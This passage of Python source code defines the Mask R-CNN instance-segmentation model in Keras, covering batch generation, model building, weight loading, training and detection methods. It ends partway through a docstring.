if gt_boxes.shape[0] > config.MAX_GT_INSTANCES: ids = np.random.choice( np.arange(gt_boxes.shape[0]), config.MAX_GT_INSTANCES, replace=False) gt_class_ids = gt_class_ids[ids] gt_boxes = gt_boxes[ids] gt_masks = gt_masks[:, :, ids] # Add to batch batch_image_meta[b] = image_meta batch_rpn_match[b] = rpn_match[:, np.newaxis] batch_rpn_bbox[b] = rpn_bbox batch_images[b] = mold_image(image.astype(np.float32), config) batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks if random_rois: batch_rpn_rois[b] = rpn_rois if detection_targets: batch_rois[b] = rois batch_mrcnn_class_ids[b] = mrcnn_class_ids batch_mrcnn_bbox[b] = mrcnn_bbox batch_mrcnn_mask[b] = mrcnn_mask b += 1 # Batch full? if b >= batch_size: inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox, batch_gt_class_ids, batch_gt_boxes, batch_gt_masks] outputs = [] if random_rois: inputs.extend([batch_rpn_rois]) if detection_targets: inputs.extend([batch_rois]) # Keras requires that output and targets have the same number of dimensions batch_mrcnn_class_ids = np.expand_dims( batch_mrcnn_class_ids, -1) outputs.extend( [batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask]) yield inputs, outputs # start a new batch b = 0 except (GeneratorExit, KeyboardInterrupt): raise except: # Log it and skip the image logging.exception("Error processing image {}".format( dataset.image_info[image_id])) error_count += 1 if error_count > 5: raise ############################################################ # MaskRCNN Class ############################################################ class MaskRCNN(): """Encapsulates the Mask RCNN model functionality. The actual Keras model is in the keras_model property. """ def __init__(self, mode, config, model_dir): """ mode: Either "training" or "inference" config: A Sub-class of the Config class model_dir: Directory to save training logs and trained weights """ assert mode in ['training', 'inference'] self.mode = mode self.config = config self.model_dir = model_dir self.set_log_dir() self.keras_model = self.build(mode=mode, config=config) def build(self, mode, config): """Build Mask R-CNN architecture. input_shape: The shape of the input image. mode: Either "training" or "inference". The inputs and outputs of the model differ accordingly. """ assert mode in ['training', 'inference'] # Image size must be dividable by 2 multiple times h, w = config.IMAGE_SHAPE[:2] if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6): raise Exception("Image size must be dividable by 2 at least 6 times " "to avoid fractions when downscaling and upscaling." "For example, use 256, 320, 384, 448, 512, ... etc. ") # Inputs input_image = KL.Input( shape=[None, None, config.IMAGE_SHAPE[2]], name="input_image") input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE], name="input_image_meta") if mode == "training": # RPN GT input_rpn_match = KL.Input( shape=[None, 1], name="input_rpn_match", dtype=tf.int32) input_rpn_bbox = KL.Input( shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32) # Detection GT (class IDs, bounding boxes, and masks) # 1. GT Class IDs (zero padded) input_gt_class_ids = KL.Input( shape=[None], name="input_gt_class_ids", dtype=tf.int32) # 2. 
GT Boxes in pixels (zero padded) # [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates input_gt_boxes = KL.Input( shape=[None, 4], name="input_gt_boxes", dtype=tf.float32) # Normalize coordinates gt_boxes = KL.Lambda(lambda x: norm_boxes_graph( x, K.shape(input_image)[1:3]))(input_gt_boxes) # 3. GT Masks (zero padded) # [batch, height, width, MAX_GT_INSTANCES] if config.USE_MINI_MASK: input_gt_masks = KL.Input( shape=[config.MINI_MASK_SHAPE[0], config.MINI_MASK_SHAPE[1], None], name="input_gt_masks", dtype=bool) else: input_gt_masks = KL.Input( shape=[config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1], None], name="input_gt_masks", dtype=bool) elif mode == "inference": # Anchors in normalized coordinates input_anchors = KL.Input(shape=[None, 4], name="input_anchors") # Build the shared convolutional layers. # Bottom-up Layers # Returns a list of the last layers of each stage, 5 in total. # Don't create the thead (stage 5), so we pick the 4th item in the list. if callable(config.BACKBONE): _, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True, train_bn=config.TRAIN_BN) else: _, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE, stage5=True, train_bn=config.TRAIN_BN) # Top-down Layers # TODO: add assert to varify feature map sizes match what's in config P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5) P4 = KL.Add(name="fpn_p4add")([ KL.UpSampling2D(size=(2, 2), name="fpn_p5upsampled")(P5), KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)]) P3 = KL.Add(name="fpn_p3add")([ KL.UpSampling2D(size=(2, 2), name="fpn_p4upsampled")(P4), KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)]) P2 = KL.Add(name="fpn_p2add")([ KL.UpSampling2D(size=(2, 2), name="fpn_p3upsampled")(P3), KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)]) # Attach 3x3 conv to all P layers to get the final feature maps. P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p2")(P2) P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p3")(P3) P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p4")(P4) P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p5")(P5) # P6 is used for the 5th anchor scale in RPN. Generated by # subsampling from P5 with stride of 2. P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name="fpn_p6")(P5) # Note that P6 is used in RPN, but not in the classifier heads. rpn_feature_maps = [P2, P3, P4, P5, P6] mrcnn_feature_maps = [P2, P3, P4, P5] # Anchors if mode == "training": anchors = self.get_anchors(config.IMAGE_SHAPE) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape) # A hack to get around Keras's bad support for constants anchors = KL.Lambda(lambda x: tf.Variable(anchors), name="anchors")(input_image) else: anchors = input_anchors # RPN Model rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE, len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE) # Loop through pyramid layers layer_outputs = [] # list of lists for p in rpn_feature_maps: layer_outputs.append(rpn([p])) # Concatenate layer outputs # Convert from list of lists of level outputs to list of lists # of outputs across levels. # e.g. 
[[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]] output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"] outputs = list(zip(*layer_outputs)) outputs = [KL.Concatenate(axis=1, name=n)(list(o)) for o, n in zip(outputs, output_names)] rpn_class_logits, rpn_class, rpn_bbox = outputs # Generate proposals # Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates # and zero padded. proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\ else config.POST_NMS_ROIS_INFERENCE rpn_rois = ProposalLayer( proposal_count=proposal_count, nms_threshold=config.RPN_NMS_THRESHOLD, name="ROI", config=config)([rpn_class, rpn_bbox, anchors]) if mode == "training": # Class ID mask to mark class IDs supported by the dataset the image # came from. active_class_ids = KL.Lambda( lambda x: parse_image_meta_graph(x)["active_class_ids"] )(input_image_meta) if not config.USE_RPN_ROIS: # Ignore predicted ROIs and use ROIs provided as an input. input_rois = KL.Input(shape=[config.POST_NMS_ROIS_TRAINING, 4], name="input_roi", dtype=np.int32) # Normalize coordinates target_rois = KL.Lambda(lambda x: norm_boxes_graph( x, K.shape(input_image)[1:3]))(input_rois) else: target_rois = rpn_rois # Generate detection targets # Subsamples proposals and generates target outputs for training # Note that proposal class IDs, gt_boxes, and gt_masks are zero # padded. Equally, returned rois and targets are zero padded. rois, target_class_ids, target_bbox, target_mask =\ DetectionTargetLayer(config, name="proposal_targets")([ target_rois, input_gt_class_ids, gt_boxes, input_gt_masks]) # Network Heads # TODO: verify that this handles zero padded ROIs mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\ fpn_classifier_graph(rois, mrcnn_feature_maps, input_image_meta, config.POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN, fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE) mrcnn_mask = build_fpn_mask_graph(rois, mrcnn_feature_maps, input_image_meta, config.MASK_POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN) # TODO: clean up (use tf.identify if necessary) output_rois = KL.Lambda(lambda x: x * 1, name="output_rois")(rois) # Losses rpn_class_loss = KL.Lambda(lambda x: rpn_class_loss_graph(*x), name="rpn_class_loss")( [input_rpn_match, rpn_class_logits]) rpn_bbox_loss = KL.Lambda(lambda x: rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")( [input_rpn_bbox, input_rpn_match, rpn_bbox]) class_loss = KL.Lambda(lambda x: mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")( [target_class_ids, mrcnn_class_logits, active_class_ids]) bbox_loss = KL.Lambda(lambda x: mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")( [target_bbox, target_class_ids, mrcnn_bbox]) mask_loss = KL.Lambda(lambda x: mrcnn_mask_loss_graph(*x), name="mrcnn_mask_loss")( [target_mask, target_class_ids, mrcnn_mask]) # Model inputs = [input_image, input_image_meta, input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes, input_gt_masks] if not config.USE_RPN_ROIS: inputs.append(input_rois) outputs = [rpn_class_logits, rpn_class, rpn_bbox, mrcnn_class_logits, mrcnn_class, mrcnn_bbox, mrcnn_mask, rpn_rois, output_rois, rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss, mask_loss] model = KM.Model(inputs, outputs, name='mask_rcnn') else: # Network Heads # Proposal classifier and BBox regressor heads mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\ fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta, config.POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN, 
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE) # Detections # output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in # normalized coordinates detections = DetectionLayer(config, name="mrcnn_detection")( [rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta]) # Create masks for detections detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections) mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps, input_image_meta, config.MASK_POOL_SIZE, config.NUM_CLASSES, train_bn=config.TRAIN_BN) model = KM.Model([input_image, input_image_meta, input_anchors], [detections, mrcnn_class, mrcnn_bbox, mrcnn_mask, rpn_rois, rpn_class, rpn_bbox], name='mask_rcnn') # Add multi-GPU support. if config.GPU_COUNT > 1: from mrcnn.parallel_model import ParallelModel model = ParallelModel(model, config.GPU_COUNT) return model def find_last(self): """Finds the last checkpoint file of the last trained model in the model directory. Returns: The path of the last checkpoint file """ # Get directory names. Each directory corresponds to a model dir_names = next(os.walk(self.model_dir))[1] key = self.config.NAME.lower() dir_names = filter(lambda f: f.startswith(key), dir_names) dir_names = sorted(dir_names) if not dir_names: import errno raise FileNotFoundError( errno.ENOENT, "Could not find model directory under {}".format(self.model_dir)) # Pick last directory dir_name = os.path.join(self.model_dir, dir_names[-1]) # Find the last checkpoint checkpoints = next(os.walk(dir_name))[2] checkpoints = filter(lambda f: f.startswith("mask_rcnn"), checkpoints) checkpoints = sorted(checkpoints) if not checkpoints: import errno raise FileNotFoundError( errno.ENOENT, "Could not find weight files in {}".format(dir_name)) checkpoint = os.path.join(dir_name, checkpoints[-1]) return checkpoint def load_weights(self, filepath, by_name=False, exclude=None): """Modified version of the corresponding Keras function with the addition of multi-GPU support and the ability to exclude some layers from loading. exclude: list of layer names to exclude """ import h5py # Conditional import to support versions of Keras before 2.2 # TODO: remove in about 6 months (end of 2018) try: from keras.engine import saving except ImportError: # Keras before 2.2 used the 'topology' namespace. from keras.engine import topology as saving if exclude: by_name = True if h5py is None: raise ImportError('`load_weights` requires h5py.') f = h5py.File(filepath, mode='r') if 'layer_names' not in f.attrs and 'model_weights' in f: f = f['model_weights'] # In multi-GPU training, we wrap the model. Get layers # of the inner model because they have the weights. keras_model = self.keras_model layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\ else keras_model.layers # Exclude some layers if exclude: layers = filter(lambda l: l.name not in exclude, layers) if by_name: saving.load_weights_from_hdf5_group_by_name(f, layers) else: saving.load_weights_from_hdf5_group(f, layers) if hasattr(f, 'close'): f.close() # Update the log directory self.set_log_dir(filepath) def get_imagenet_weights(self): """Downloads ImageNet trained weights from Keras. Returns path to weights file. 
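Illustrative example (editor's sketch, not part of the original source;
assumes `model` is a MaskRCNN instance, `image` is an RGB numpy array,
and config.BATCH_SIZE == 1 for the inference call):

    # Start training from ImageNet-pretrained ResNet weights
    model.load_weights(model.get_imagenet_weights(), by_name=True)

    # ...or resume from the most recent checkpoint under model_dir
    model.load_weights(model.find_last(), by_name=True)

    # In inference mode, run the full detection pipeline on one image
    results = model.detect([image], verbose=1)
    r = results[0]
    r["rois"], r["class_ids"], r["scores"], r["masks"]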
""" from keras.utils.data_utils import get_file TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/'\ 'releases/download/v0.2/'\ 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5' weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models', md5_hash='a268eb855778b3df3c7506639542a6af') return weights_path def compile(self, learning_rate, momentum): """Gets the model ready for training. Adds losses, regularization, and metrics. Then calls the Keras compile() function. """ # Optimizer object optimizer = keras.optimizers.SGD( lr=learning_rate, momentum=momentum, clipnorm=self.config.GRADIENT_CLIP_NORM) # Add Losses # First, clear previously set losses to avoid duplication self.keras_model._losses = [] self.keras_model._per_input_losses = {} loss_names = [ "rpn_class_loss", "rpn_bbox_loss", "mrcnn_class_loss", "mrcnn_bbox_loss", "mrcnn_mask_loss"] for name in loss_names: layer = self.keras_model.get_layer(name) if layer.output in self.keras_model.losses: continue loss = ( tf.reduce_mean(layer.output, keepdims=True) * self.config.LOSS_WEIGHTS.get(name, 1.)) self.keras_model.add_loss(loss) # Add L2 Regularization # Skip gamma and beta weights of batch normalization layers. reg_losses = [ keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tf.float32) for w in self.keras_model.trainable_weights if 'gamma' not in w.name and 'beta' not in w.name] self.keras_model.add_loss(tf.add_n(reg_losses)) # Compile self.keras_model.compile( optimizer=optimizer, loss=[None] * len(self.keras_model.outputs)) # Add metrics for losses for name in loss_names: if name in self.keras_model.metrics_names: continue layer = self.keras_model.get_layer(name) self.keras_model.metrics_names.append(name) loss = ( tf.reduce_mean(layer.output, keepdims=True) * self.config.LOSS_WEIGHTS.get(name, 1.)) self.keras_model.metrics_tensors.append(loss) def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1): """Sets model layers as trainable if their names match the given regular expression. """ # Print message on the first call (but not on recursive calls) if verbose > 0 and keras_model is None: log("Selecting layers to train") keras_model = keras_model or self.keras_model # In multi-GPU training, we wrap the model. Get layers # of the inner model because they have the weights. layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\ else keras_model.layers for layer in layers: # Is the layer a model? if layer.__class__.__name__ == 'Model': print("In model: ", layer.name) self.set_trainable( layer_regex, keras_model=layer, indent=indent + 4) continue if not layer.weights: continue # Is it trainable? trainable = bool(re.fullmatch(layer_regex, layer.name)) # Update layer. If layer is a container, update inner layer. if layer.__class__.__name__ == 'TimeDistributed': layer.layer.trainable = trainable else: layer.trainable = trainable # Print trainable layer names if trainable and verbose > 0: log("{}{:20} ({})".format(" " * indent, layer.name, layer.__class__.__name__)) def set_log_dir(self, model_path=None): """Sets the model log directory and epoch counter. model_path: If None, or a format different from what this code uses then set a new log directory and start epochs from 0. Otherwise, extract the log directory and the epoch counter from the file name. 
""" # Set date and epoch counter as if starting a new model self.epoch = 0 now = datetime.datetime.now() # If we have a model path with date and epochs use them if model_path: # Continue from we left of. Get epoch and date from the file name # A sample model path might look like: # \path\to\logs\coco20171029T2315\mask_rcnn_coco_0001.h5 (Windows) # /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5 (Linux) regex = r".*[/\\][\w-]+(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})[/\\]mask\_rcnn\_[\w-]+(\d{4})\.h5" m = re.match(regex, model_path) if m: now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4)), int(m.group(5))) # Epoch number in file is 1-based, and in Keras code it's 0-based. # So, adjust for that then increment by one to start from the next epoch self.epoch = int(m.group(6)) - 1 + 1 print('Re-starting from epoch %d' % self.epoch) # Directory for training logs self.log_dir = os.path.join(self.model_dir, "{}{:%Y%m%dT%H%M}".format( self.config.NAME.lower(), now)) # Path to save after each epoch. Include placeholders that get filled by Keras. self.checkpoint_path = os.path.join(self.log_dir, "mask_rcnn_{}_*epoch*.h5".format( self.config.NAME.lower())) self.checkpoint_path = self.checkpoint_path.replace( "*epoch*", "{epoch:04d}") def train(self, train_dataset, val_dataset, learning_rate, epochs, layers, augmentation=None, custom_callbacks=None, no_augmentation_sources=None): """Train the model. train_dataset, val_dataset: Training and validation Dataset objects. learning_rate: The learning rate to train with epochs: Number of training epochs. Note that previous training epochs are considered to be done alreay, so this actually determines the epochs to train in total rather than in this particaular call. layers: Allows selecting wich layers to train. It can be: - A regular expression to match layer names to train - One of these predefined values: heads: The RPN, classifier and mask heads of the network all: All the layers 3+: Train Resnet stage 3 and up 4+: Train Resnet stage 4 and up 5+: Train Resnet stage 5 and up augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation. For example, passing imgaug.augmenters.Fliplr(0.5) flips images right/left 50% of the time. You can pass complex augmentations as well. This augmentation applies 50% of the time, and when it does it flips images right/left half the time and adds a Gaussian blur with a random sigma in range 0 to 5. augmentation = imgaug.augmenters.Sometimes(0.5, [ imgaug.augmenters.Fliplr(0.5), imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0)) ]) custom_callbacks: Optional. Add custom callbacks to be called with the keras fit_generator method. Must be list of type keras.callbacks. no_augmentation_sources: Optional. List of sources to exclude for augmentation. A source is string that identifies a dataset and is defined in the Dataset class. """ assert self.mode == "training", "Create model in training mode." 
# Pre-defined layer regular expressions layer_regex = { # all layers but the backbone "heads": r"(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", # From a specific Resnet stage and up "3+": r"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", "4+": r"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", "5+": r"(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)", # All layers "all": ".*", } if layers in layer_regex.keys(): layers = layer_regex[layers] # Data generators train_generator = data_generator(train_dataset, self.config, shuffle=True, augmentation=augmentation, batch_size=self.config.BATCH_SIZE, no_augmentation_sources=no_augmentation_sources) val_generator = data_generator(val_dataset, self.config, shuffle=True, batch_size=self.config.BATCH_SIZE) # Create log_dir if it does not exist if not os.path.exists(self.log_dir): os.makedirs(self.log_dir) # Callbacks callbacks = [ keras.callbacks.TensorBoard(log_dir=self.log_dir, histogram_freq=0, write_graph=True, write_images=False), keras.callbacks.ModelCheckpoint(self.checkpoint_path, verbose=0, save_weights_only=True), ] # Add custom callbacks to the list if custom_callbacks: callbacks += custom_callbacks # Train log("\nStarting at epoch {}. LR={}\n".format(self.epoch, learning_rate)) log("Checkpoint Path: {}".format(self.checkpoint_path)) self.set_trainable(layers) self.compile(learning_rate, self.config.LEARNING_MOMENTUM) # Work-around for Windows: Keras fails on Windows when using # multiprocessing workers. See discussion here: # https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009 if os.name is 'nt': workers = 0 else: workers = multiprocessing.cpu_count() self.keras_model.fit_generator( train_generator, initial_epoch=self.epoch, epochs=epochs, steps_per_epoch=self.config.STEPS_PER_EPOCH, callbacks=callbacks, validation_data=val_generator, validation_steps=self.config.VALIDATION_STEPS, max_queue_size=100, workers=workers, use_multiprocessing=True, ) self.epoch = max(self.epoch, epochs) def mold_inputs(self, images): """Takes a list of images and modifies them to the format expected as an input to the neural network. images: List of image matrices [height,width,depth]. Images can have different sizes. Returns 3 Numpy matrices: molded_images: [N, h, w, 3]. Images resized and normalized. image_metas: [N, length of meta data]. Details about each image. windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the original image (padding excluded). 
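Illustrative example (editor's sketch, not part of the original source;
assumes IMAGE_RESIZE_MODE == "square", IMAGE_MIN_DIM == 800,
IMAGE_MAX_DIM == 1024, and a 480x640 RGB input image):

    molded_images, image_metas, windows = model.mold_inputs([image])
    # the image is scaled by 1.6 to 768x1024, then zero-padded to a square
    molded_images.shape   # -> (1, 1024, 1024, 3)
    windows[0]            # -> array([128, 0, 896, 1024])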
""" molded_images = [] image_metas = [] windows = [] for image in images: # Resize image # TODO: move resizing to mold_image() molded_image, window, scale, padding, crop = utils.resize_image( image, min_dim=self.config.IMAGE_MIN_DIM, min_scale=self.config.IMAGE_MIN_SCALE, max_dim=self.config.IMAGE_MAX_DIM, mode=self.config.IMAGE_RESIZE_MODE) molded_image = mold_image(molded_image, self.config) # Build image_meta image_meta = compose_image_meta( 0, image.shape, molded_image.shape, window, scale, np.zeros([self.config.NUM_CLASSES], dtype=np.int32)) # Append molded_images.append(molded_image) windows.append(window) image_metas.append(image_meta) # Pack into arrays molded_images = np.stack(molded_images) image_metas = np.stack(image_metas) windows = np.stack(windows) return molded_images, image_metas, windows def unmold_detections(self, detections, mrcnn_mask, original_image_shape, image_shape, window): """Reformats the detections of one image from the format of the neural network output to a format suitable for use in the rest of the application. detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates mrcnn_mask: [N, height, width, num_classes] original_image_shape: [H, W, C] Original image shape before resizing image_shape: [H, W, C] Shape of the image after resizing and padding window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real image is excluding the padding. Returns: boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels class_ids: [N] Integer class IDs for each bounding box scores: [N] Float probability scores of the class_id masks: [height, width, num_instances] Instance masks """ # How many detections do we have? # Detections array is padded with zeros. Find the first class_id == 0. zero_ix = np.where(detections[:, 4] == 0)[0] N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0] # Extract boxes, class_ids, scores, and class-specific masks boxes = detections[:N, :4] class_ids = detections[:N, 4].astype(np.int32) scores = detections[:N, 5] masks = mrcnn_mask[np.arange(N), :, :, class_ids] # Translate normalized coordinates in the resized image to pixel # coordinates in the original image before resizing window = utils.norm_boxes(window, image_shape[:2]) wy1, wx1, wy2, wx2 = window shift = np.array([wy1, wx1, wy1, wx1]) wh = wy2 - wy1 # window height ww = wx2 - wx1 # window width scale = np.array([wh, ww, wh, ww]) # Convert boxes to normalized coordinates on the window boxes = np.divide(boxes - shift, scale) # Convert boxes to pixel coordinates on the original image boxes = utils.denorm_boxes(boxes, original_image_shape[:2]) # Filter out detections with zero area. Happens in early training when # network weights are still random exclude_ix = np.where( (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0] if exclude_ix.shape[0] > 0: boxes = np.delete(boxes, exclude_ix, axis=0) class_ids = np.delete(class_ids, exclude_ix, axis=0) scores = np.delete(scores, exclude_ix, axis=0) masks = np.delete(masks, exclude_ix, axis=0) N = class_ids.shape[0] # Resize masks to original image size and set boundary threshold. full_masks = [] for i in range(N): # Convert neural network mask to full size mask full_mask = utils.unmold_mask(masks[i], boxes[i], original_image_shape) full_masks.append(full_mask) full_masks = np.stack(full_masks, axis=-1)\ if full_masks else np.empty(original_image_shape[:2] + (0,)) return boxes, class_ids, scores, full_masks def detect(self, images, verbose=0): """Runs the detection pipeline. 
images: List of images, potentially of different sizes. Returns a list of dicts, one dict per image. The dict contains: rois: [N, (y1, x1, y2, x2)] detection bounding boxes class_ids: [N] int class IDs scores: [N] float probability scores for the class IDs masks: [H, W, N] instance binary masks """ assert self.mode == "inference", "Create model in inference mode." assert len( images) == self.config.BATCH_SIZE, "len(images) must be equal to BATCH_SIZE" if verbose: log("Processing {} images".format(len(images))) for image in images: log("image", image) # Mold inputs to format expected by the neural network molded_images, image_metas, windows = self.mold_inputs(images) # Validate image sizes # All images in a batch MUST be of the same size image_shape = molded_images[0].shape for g in molded_images[1:]: assert g.shape == image_shape,\ "After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes." # Anchors anchors = self.get_anchors(image_shape) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape) if verbose: log("molded_images", molded_images) log("image_metas", image_metas) log("anchors", anchors) # Run object detection detections, _, _, mrcnn_mask, _, _, _ =\ self.keras_model.predict([molded_images, image_metas, anchors], verbose=0) # Process detections results = [] for i, image in enumerate(images): final_rois, final_class_ids, final_scores, final_masks =\ self.unmold_detections(detections[i], mrcnn_mask[i], image.shape, molded_images[i].shape, windows[i]) results.append({ "rois": final_rois, "class_ids": final_class_ids, "scores": final_scores, "masks": final_masks, }) return results def detect_molded(self, molded_images, image_metas, verbose=0): """Runs the detection pipeline, but expect inputs that are molded already. Used mostly for debugging and inspecting the model. molded_images: List of images loaded using load_image_gt() image_metas: image meta data, also returned by load_image_gt() Returns a list of dicts, one dict per image. The dict contains: rois: [N, (y1, x1, y2, x2)] detection bounding boxes class_ids: [N] int class IDs scores: [N] float probability scores for the class IDs masks: [H, W, N] instance binary masks """ assert self.mode == "inference", "Create model in inference mode." assert len(molded_images) == self.config.BATCH_SIZE,\ "Number of images must be equal to BATCH_SIZE" if verbose: log("Processing {} images".format(len(molded_images))) for image in molded_images: log("image", image) # Validate image sizes # All images in a batch MUST be of the same size image_shape = molded_images[0].shape for g in molded_images[1:]: assert g.shape == image_shape, "Images must have the same size" # Anchors anchors = self.get_anchors(image_shape) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? 
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape) if verbose: log("molded_images", molded_images) log("image_metas", image_metas) log("anchors", anchors) # Run object detection detections, _, _, mrcnn_mask, _, _, _ =\ self.keras_model.predict([molded_images, image_metas, anchors], verbose=0) # Process detections results = [] for i, image in enumerate(molded_images): window = [0, 0, image.shape[0], image.shape[1]] final_rois, final_class_ids, final_scores, final_masks =\ self.unmold_detections(detections[i], mrcnn_mask[i], image.shape, molded_images[i].shape, window) results.append({ "rois": final_rois, "class_ids": final_class_ids, "scores": final_scores, "masks": final_masks, }) return results def get_anchors(self, image_shape): """Returns anchor pyramid for the given image size.""" backbone_shapes = compute_backbone_shapes(self.config, image_shape) # Cache anchors and reuse if image shape is the same if not hasattr(self, "_anchor_cache"): self._anchor_cache = {} if not tuple(image_shape) in self._anchor_cache: # Generate Anchors a = utils.generate_pyramid_anchors( self.config.RPN_ANCHOR_SCALES, self.config.RPN_ANCHOR_RATIOS, backbone_shapes, self.config.BACKBONE_STRIDES, self.config.RPN_ANCHOR_STRIDE) # Keep a copy of the latest anchors in pixel coordinates because # it's used in inspect_model notebooks. # TODO: Remove this after the notebook are refactored to not use it self.anchors = a # Normalize coordinates self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2]) return self._anchor_cache[tuple(image_shape)] def ancestor(self, tensor, name, checked=None): """Finds the ancestor of a TF tensor in the computation graph. tensor: TensorFlow symbolic tensor. name: Name of ancestor tensor to find checked: For internal use. A list of tensors that were already searched to avoid loops in traversing the graph. """ checked = checked if checked is not None else [] # Put a limit on how deep we go to avoid very long loops if len(checked) > 500: return None # Convert name to a regex and allow matching a number prefix # because Keras adds them automatically if isinstance(name, str): name = re.compile(name.replace("/", r"(\_\d+)*/")) parents = tensor.op.inputs for p in parents: if p in checked: continue if bool(re.fullmatch(name, p.name)): return p checked.append(p) a = self.ancestor(p, name, checked) if a is not None: return a return None def find_trainable_layer(self, layer): """If a layer is encapsulated by another layer, this function digs through the encapsulation and returns the layer that holds the weights. """ if layer.__class__.__name__ == 'TimeDistributed': return self.find_trainable_layer(layer.layer) return layer def get_trainable_layers(self): """Returns a list of layers that have weights.""" layers = [] # Loop through all layers for l in self.keras_model.layers: # If layer is a wrapper, find inner trainable layer l = self.find_trainable_layer(l) # Include layer if it has weights if l.get_weights(): layers.append(l) return layers def run_graph(self, images, outputs, image_metas=None): """Runs a sub-set of the computation graph that computes the given outputs. image_metas: If provided, the images are assumed to be already molded (i.e. resized, padded, and normalized) outputs: List of tuples (name, tensor) to compute. The tensors are symbolic TensorFlow tensors and the names are for easy tracking. Returns an ordered dict of results. Keys are the names received in the input and values are Numpy arrays. 
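Illustrative example (editor's sketch, not part of the original source;
assumes an inference-mode model with BATCH_SIZE == 1 and a loaded `image`):

    activations = model.run_graph([image], [
        ("proposals", model.keras_model.get_layer("ROI").output),
        ("rpn_class", model.keras_model.get_layer("rpn_class").output),
    ])
    activations["proposals"]   # numpy array of proposal boxes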
